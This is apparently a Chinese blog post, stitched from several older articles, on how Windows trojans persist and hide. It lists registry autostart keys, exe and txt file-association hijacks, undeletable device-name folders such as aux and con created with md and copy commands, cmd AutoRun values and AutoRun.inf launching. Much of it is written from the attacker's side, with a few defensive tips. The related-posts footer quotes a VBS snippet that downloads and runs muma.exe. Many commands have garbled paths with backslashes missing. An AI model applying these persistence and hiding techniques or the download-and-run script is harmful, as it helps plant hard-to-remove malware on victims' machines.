木马启动地方又三处

AI权益加码!Claude Code、Cursor等20+工具免费用! 购周边限时加赠Coding Plan Lite,畅享主流AI工具!学习进阶更高效! 阅读详情
------1-----------------
Hkey_current_user/software /microsoft/windows nt/currentversion /windows 建一个字符串名为load键值为自启动程序的路径但是要注意短文件名规则,如c:/program files 应为c:/progra~1
这种方式用优化大师看不到
----------2--------------------
另一个注册表可以加启动项的位置 
HKEY_LOCAL_MACHINE/SHOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon 里面的shell建值在Explorer.exe的后面加上我门程序的路径 这样我门的程序就可以随系统启动了。
比如我门的c:/windows/system32/下有个hehe.exe木马。

-------3-------------------------
HKEY_LOCAL_MACHINE /SOFTWARE/Microsoft/WindowsNT/CurrentVersion/Winlogon,找到"Userinit"这个键值,这个键值默认为c:/WINNT/system32/userinit.exe,后面加路径,再加逗号也可以


木马对文件关联的利用

  我们知道,在注册表HKEY_LOCAL_MACHINE SoftwareMicrosoftWindowsCurrentVersionRun下可以加载程序,使之开机时自动运行,类似"Run"这样的子键在注册表中还有几处,均以"Run"开头,如RunOnce、RunServices等。除了这种方法,还有一种修改注册表的方法也可以使程序自启动。

  具体说来,就是更改文件的打开方式,这样就可以使程序跟随您打开的那种文件类型一起启动。举例来说,打开注册表,展开注册表到HKEY_CLASSES_ROOTexefileshell
opencommand,这里是exe文件的打开方式,默认键值为:"%1"%*。如果把默认键值改为Trojan.exe"%1"%*,您每次运行exe文件,这个 Trojan.exe文件就会被执行。木马灰鸽子就采用关联exe文件的打开方式,而大名鼎鼎的木马冰河采用的是也与此相似的一招——关联txt文件。

  对付这种隐藏方法,主要是经常检查注册表,看文件的打开方式是否发生了变化。如果发生了变化,就将打开方式改回来。最好能经常备份注册表,发现问题后立即用备份文件恢复注册表,既方便、快捷,又安全、省事。


木马对设备名的利用

  大家知道,在Windows下无法以设备名来命名文件或文件夹,这些设备名主要有aux、com1、com2、prn、con、nul等,但Windows 2000/XP有个漏洞可以以设备名来命名文件或文件夹,让木马可以躲在那里而不被发现。

  具体方法是:点击"开始"菜单的"运行",输入cmd.exe,回车进入命令提示符窗口,然后输入md c:con/命令,可以建立一个名为con的目录。默认请况下,Windows是无法建立这类目录的,正是利用了Windows的漏洞我们才可以建立此目录。再试试输入md c:aux/命令,可以建立aux目录,输入md c:prn/可以建立prn目录,输入md c:com1/目录可以建立Com1目录,而输入md c: ul/则可以建立一个名为nul的目录。在资源管理器中依次点击试试,您会发现当我们试图打开以aux或com1命名的文件夹时,explorer.exe失去了响应,而许多 "牧马人"就是利用这个方法将木马隐藏在这类特殊的文件夹中,从而达到隐藏、保护木马程序的目的。

  现在,我们可以把文件复制到这个特殊的目录下,当然,不能直接在Windows中复制,需要采用特殊的方法,在CMD窗口中输入copy muma.exe /.c:aux/命令,就可以把木马文件muma.exe复制到C盘下的aux文件夹中,然后点击"开始"菜单中的"运行",在"运行"中输入c:aux muam.exe,就会成功启动该木马。我们可以通过点击文件夹名进入此类特殊目录,不过,如果您要试图在资源管理器中删除它,会发现这根本就是徒劳的,Windows会提示找不到该文件。

  由于使用del c:aux/命令可以删除其中的muma.exe文件,所以,为了达到更好的隐藏和保护效果,下木马者会把 muma.exe文件也改名,让我们很难删除。具体方法就是在复制木马文件到aux文件夹时使用命令copy muma.exe /.c: con.exe,就可以把木马文件muma.exe复制到aux目录中,并且改名为con.exe,而con.exe文件是无法用普通方法删除的。

  可能有的朋友会想,这个con.exe文件在"开始"菜单的"运行"中无法运行啊。其实不然,只要在命令行方式下输入cmd /c /.c:con就可以运行这个程序了。在运行时会有一个cmd窗口一闪而过,下木马者一般来说会对其进行改进,方法有很多,可以利用开机脚本,也可以利用cmd.exe的 autorun:在注册表HKEY_LOCAL_ MACHINESoftwareMicrosoftCommand Processor下建一个字串 AutoRun,值为要运行的.bat文件或.cmd文件的路径,如c:winntsystem32auto.cmd,如果建立相应的文件,它的内容为@ /.c:con,就可以达到隐蔽的效果。

  对于这类特殊的文件夹,发现后我们可以采用如下方法来删除它:先用del /.c:con.exe命令删除con.exe文件(该文件假设就是其中的木马文件名),然后再用rd /.c:aux命令删除aux文件夹即可。

  好了,文章到这里就结束了。由于水平有限,文中如有不正确或值得商榷的地方欢迎大家批评指点,另外,写作时曾参阅过网上高手们的帖子,受益匪浅,在此一并谢过!


不过,AutoRun不仅能应用于光盘中,同样也可以应用于硬盘中(要注意的是,AutoRun.inf必须存放在磁盘根目录下才能起作用)。让我们一起看看AutoRun.inf文件的内容吧。

  打开记事本,新建一个文件,将其命名为AutoRun.inf,在AutoRun.inf中键入以下内容:

[AutoRun]
Icon=C:WindowsSystemShell32.DLL,21
Open=C:Program FilesACDSeeACDSee.exe
其中,"[AutoRun]"是必须的固定格式,一个标准的AutoRun文件必须以它开头,目的是告诉系统执行它下面几行的命令;第二行"Icon=C: WindowsSystemShell32.DLL,21"是给硬盘或光盘设定一个个性化的图标,"Shell32.DLL"是包含很多Windows图标的系统文件,"21"表示显示编号为21的图标,无数字则默认采用文件中的第一个图标;第三行"Open=C: Program FilesACDSeeACDSee.exe"指出要运行程序的路径及其文件名。

  如果把Open行换为木马文件,并将这个AutoRun.inf文件设置为隐藏属性,我们点击硬盘时就会启动木马。

  为防止遭到这样的"埋伏",可以禁止硬盘AutoRun功能。在"开始"菜单的"运行"中输入Regedit,打开注册表编辑器,展开到 HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionPoliciesExploer主键下,在右侧窗口中找到"NoDriveTypeAutoRun",就是它决定了是否执行CDROM或硬盘的AutoRun功能。将其键值改为9D, 00,00,00就可以关闭硬盘的AutoRun功能,如果改为B5,00,00,00则禁止光盘的AutoRun功能。修改后重新启动计算机,设置就会生效。
Linux服务器挖矿木马实战清除与auditd主动防御 Linux服务器挖矿木马是一种典型的隐蔽型恶意软件,常通过SSH爆破、弱口令或未修复漏洞植入,利用CPU资源进行加密货币挖掘。其核心原理是伪装系统进程(如kthreadd)、滥用临时目录(/tmp/.ICE-unix)、建立境外C2连接,并通过多层持久化机制(cron、systemd、内核模块)实现自启动与抗清除。技术价值在于不依赖签名库的免杀检测能力与分层清除策略,可显著提升生产环境的安全韧性。典型应用场景包括中小企业无专职安全团队的运维现场、老旧系统加固、以及告警响应SOP建设。本文聚焦Linux挖矿木 阅读详情

相关推荐

TheFatRat木马生成工具实战指南:从安装到多平台Payload生成

本文详细介绍了TheFatRat木马生成工具的多平台Payload生成实战技巧,包括环境部署避坑、Payload生成策略、免杀强化技巧及多平台攻击案例。特别针对Windows Defender、企业级防火墙和移动端渗透提供了黄金组合方案,帮助安全人员高效生成隐蔽性强的后门程序。

weixin_42685438的博客 366

解决利用WMI劫持浏览器主页为hao123hao916等的修复工具及方法

该工具为最流行的版本 1.50.1131.1,75% 的安装比例,挺老的。使用完工具,要把所有浏览器的快捷方式,都改好。改完了,删掉任务栏上浏览器的快速启动项,重新添加改完了的浏览器快捷方式。

Windows安全防护-深入剖析QQ巨盗病毒行为与查杀策略

本文深入剖析了QQ巨盗病毒的行为特征与查杀策略,详细介绍了该病毒的文件系统操作、注册表篡改和网络行为特征。通过实战案例和工具推荐,提供了从断网处理到注册表修复的完整查杀指南,并分享了企业级防护方案和应急响应流程,帮助用户有效应对Windows平台下的QQ巨盗病毒威胁。

i8j9k0l1的博客 546

制作自动运行木马的vbs脚本

制作自动运行木马的vbs脚本 2010年05月17日   [b]自动下载并运行的VBS脚本代码 转自二进制小组   Set xPost = CreateObject("Microsoft.XMLHTTP")   xPost.Open "GET","http://www.***/muma.exe [/b][b]",0   xPost.Send()   Set sGet = Cr...

qt726qt 866

利用WMI打造完美三无后门(scrcons.exe)

ASEC是WMI中的一个标准永久事件消费者。它的作用是当与其绑定的一个事件到达时,可以执行一段预先设定好的JS/VBS脚本

穷途末路 1万+

WMI 定时启动木马

现象: 某些浏览器的快捷方式经常性自动被修改, 相当于主页修改成 hao916.com/..... 使用WMI_Tools 工具 找到以下类 __EventFilter ActiveScriptEventConsumer __FilterToConsumerBinding __TimerInstruction 删除里面相关的实例 木马脚本如下 On Error

zzz3265的专栏 6469

木马了(续)

      上次说到中木马后把电脑带到公司,让同事帮忙处理了下,回来再没在system32下发现可疑文件夹,还以为从此就一劳永逸了。可是,情况似乎并不是我想象的那么乐观。      今天每次开机后,打开IceSword查看端口状态,总是发现有一个TCP连接连向一个IP,查了下那IP是扬州的(当时我还暗想这是不是跟博客园的cookies有关呢,dudu不是扬州的吗,汗),进程程序名称那显示的是sv...

weixin_33965305的博客 79

挖矿木马排查实战:当服务器CPU深夜飙到99%,我是如何揪出并清除算力劫持进程的

凌晨 2:37,监控平台弹出一条告警:web-03 的 CPU 使用率已连续 15 分钟超过 95%。`top` 里排第一的进程叫 `java`,吃掉近 400% 的 CPU,可这台服务器从没装过 Java——八成是遭了挖矿木马。本文就把这次算力劫持从告警到清除的完整排查过程写给你看,顺手教你怎么防住下一次。 先说结论:挖矿木马不可怕,可怕的是你只杀进程不拆持久化,杀完一分钟它又原地复活。真正要

gitblog_00941的博客 444

服务器CPU被偷到100%?挖矿木马排查与清除实战手记

服务器CPU异常飙到100%却找不到原因?这篇文章把挖矿木马排查的完整流程讲透:从发现挖矿进程清理,到阻断持久化,再到系统加固,手把手带你走完一次真实的挖矿病毒应急。文中所有命令、顺序和清单都来自一线实战,你可以直接复制到终端里照做。 ## 第一章 凌晨三点,告警把值班群炸醒了 先说个真实场景。凌晨 3:17,值班手机连响十几声,监控平台弹出红色告警:一台 8 核 16G 的数据库从库 web

gitblog_00360的博客 607

CPU莫名满载还连上陌生IP?挖矿木马伪装xmrig的5步识别与清除手册

xmrig 是一款开源的多算法挖矿程序,支持 RandomX、KawPow、CryptoNight、GhostRider 等主流算法,既能连接矿池挖矿,也能用于跑算力基准测试。然而树大招风——正因为它开源、跨平台、性能强悍,恶意程序作者往往直接拿官方源码重新编译,改个名字塞进受害者的服务器,让它替自己"免费打工"。这篇文章不堆概念,只讲操作:从发现异常到彻底清除,给你一套能直接照做的 5 步流程。

gitblog_00039的博客 483

Notepad++ 突发三处高危安全漏洞:XML 配置文件遭篡改可执行任意代码,开发者紧急发布 v8.9.6.1 热修复版本

由于 Notepad++ 在开发者和运维人员群体中渗透率极高,很多生产环境的跳板机、日志分析工作站上都能找到它的身影,一旦被控,横向移动的跳板就此搭成。虽然它不能像前两个漏洞那样被用来植入木马,但在某些场景下,攻击者可以借此制造"烟雾弹"——趁用户反复重启编辑器的间隙掩盖其他恶意行为,或者通过持续的崩溃干扰正常工作流。这个看似无害的快捷方式存储文件上。或者更隐蔽的恶意二进制——当用户通过菜单执行"打开所在文件夹的命令提示符"这一常规操作时,弹出来的就不是熟悉的黑色 CMD 窗口,而是攻击者预设的代码。

ylscode的博客 594

经验总结 黑客入侵网络的50种方法3

45.解决TCP/IP筛选 在注册表里有三处,分别是:   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

河北正定欢迎您-少占鱼 1096

年会抽奖网页工具:拖入头像即用,3D墙+流星动画+自动剔除已中奖人

直接打开index.html就能用的年会抽奖网页,不用装环境、不依赖服务器。上传员工照片后自动排成3D照片墙,用Three.js渲染,支持鼠标拖拽旋转查看;背景是Canvas绘制的星空,随机划过流星动画,视觉效果活跃不单调。抽奖时自动从名单里移除已中奖者,杜绝重复中奖,适合10到200人的现场活动。所有参与者信息统一写在data.js里,奖品图标用award_0.png,重置按钮调用clear.png,输入框样式和头像资源都已预置在iptback.png和avatar文件夹中。JS依赖全打包进来了:thre

Jerry的专栏 241

如何修改Tomcat默认端口?

修改的原因: 关于8080端口:8080端口同80端口,是被用于WWW代理服务的,可以实现网页浏览,经常在访问某个网站或使用代理服务器的时候,会加上“:8080”端口号。另外Apache Tomcat web server安装后,默认的服务端口就是8080. 它存在漏洞:8080端口可以被各种病毒程序所利用,比如Brown Orifice(BrO)特洛伊木马病毒可以利用8080端口完全遥...

weixin_34033624的博客 180

软件水平【1】

1.网络故障需按照协议层次进行分层诊断,找出故障原因并进行相应处理。查看路由器的端ISI状态、协议建立状态和EIA状态属于(36)诊断。 A.物理层 B.数据链路层 C.网络层 D.传输层 2.某公司总部与各分支机构之间需要传输大量的数据,并要求在保障数据安全的同时又要兼顾密钥算法效率。针对该用户需求,设计师最可能选用的加密算法是(41)。 A.RSA B.EIGamal C.RC-5 D.SHA-1 3.种植、自启动、隐藏是木马程序的三大关键技术。在Windows操作系统中,为避免用户发现木马的存

robin9409的博客 455

实战办案:一小时内揪出并清除潜伏的 xmrig 算力劫持进程

服务器 CPU 突然冲上 100%、风扇狂转,可业务流量纹丝不动——这是"算力劫持(利用你的机器偷偷挖矿)"的典型信号,而被劫持的程序十有八九是 xmrig 的恶意变种。xmrig 本身是开源且高性能的挖矿软件,支持 RandomX、KawPow、CryptoNight 等算法,正因为它跨平台、效率高,才常被攻击者改造成挖矿木马植入他人机器。这篇文章适合运维工程师和安全分析师,也适合想自己动手排查

gitblog_00398的博客 658

vulnstack4靶场笔记

0x01 实验环境 目标端 ubuntu IP1: 192.168.157.128 IP2: 192.168.183.128 ubuntu:ubuntu win7 IP: 192.168.183.129 douser:Dotest123 DC IP: 192.168.183.130 administrator:Test2008 攻击端 windows7 192.168.157.129 kali 192.168.157.130 0x01 渗透测试 首先需要进入ubuntu开启服务,

orange777 2321
上一篇: 透还原卡和还原软件的代码
下一篇: Windows Rootkit 技术分析
iiprogram
博客等级 码龄25年 1066粉丝 1515原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值